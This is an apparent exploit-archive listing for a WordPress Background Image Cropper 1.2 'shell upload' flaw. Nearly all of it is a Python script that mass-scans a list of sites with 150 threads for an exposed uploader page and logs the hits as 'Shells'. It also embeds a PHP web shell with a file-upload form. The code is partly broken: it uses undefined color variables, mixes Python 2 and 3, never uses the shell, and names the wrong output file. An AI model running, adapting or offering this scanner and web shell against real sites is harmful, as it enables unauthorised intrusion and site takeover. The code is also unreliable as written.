WordPress Background Image Cropper 1.2 Shell Upload

`# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote  
Code Execution  
# Date: 2024-04-16  
# Author: Milad Karimi (Ex3ptionaL)  
# Contact: [email protected]  
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL  
# Vendor Homepage: https://wordpress.org  
# Software Link: https://wordpress.org/plugins/background-image-cropper/  
# Version: 1.2  
# Category : webapps  
# Tested on: windows 10 , firefox  
  
import sys , requests, re  
from multiprocessing.dummy import Pool  
from colorama import Fore  
from colorama import init  
init(autoreset=True)  
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo  
"<form method='post' enctype='multipart/form-data'> <input type='file'  
name='zb'><input type='submit' name='upload' value='upload'></form>";  
if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],  
$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to  
Upload."; } } ?>"""  
requests.urllib3.disable_warnings()  
headers = {'Connection': 'keep-alive',  
'Cache-Control': 'max-age=0',  
'Upgrade-Insecure-Requests': '1',  
'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A  
Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0  
Chrome/60.0.3112.107 Moblie Safari/537.36',  
'Accept':  
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',  
'Accept-Encoding': 'gzip, deflate',  
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',  
'referer': 'www.google.com'}  
try:  
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]  
except IndexError:  
path = str(sys.argv[0]).split('\\')  
exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')  
  
def URLdomain(site):  
if site.startswith("http://") :  
site = site.replace("http://","")  
elif site.startswith("https://") :  
site = site.replace("https://","")  
else :  
pass  
pattern = re.compile('(.*)/')  
while re.findall(pattern,site):  
sitez = re.findall(pattern,site)  
site = sitez[0]  
return site  
  
  
def FourHundredThree(url):  
try:  
url = 'http://' + URLdomain(url)  
check =  
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,  
allow_redirects=True,timeout=15)  
if 'enctype="multipart/form-data" name="uploader"  
id="uploader"><input type="file" name="file" size="50"><input name="_upl"  
type="submit" id="_upl" value="Upload' in check.content:  
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)  
open('Shells.txt', 'a').write(url +  
'/wp-content/plugins/background-image-cropper/ups.php\n')  
else:  
url = 'https://' + URLdomain(url)  
check =  
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,  
allow_redirects=True,verify=False ,timeout=15)  
if 'enctype="multipart/form-data" name="uploader"  
id="uploader"><input type="file" name="file" size="50"><input name="_upl"  
type="submit" id="_upl" value="Upload' in check.content:  
print ' -| ' + url + ' --> {}[Succefully]'.format(fg)  
open('Shells.txt', 'a').write(url +  
'/wp-content/plugins/background-image-cropper/ups.php\n')  
else:  
print ' -| ' + url + ' --> {}[Failed]'.format(fr)  
except :  
print ' -| ' + url + ' --> {}[Failed]'.format(fr)  
  
mp = Pool(150)  
mp.map(FourHundredThree, target)  
mp.close()  
mp.join()  
  
print '\n [!] {}Saved in LOL.txt'.format(fc)  
`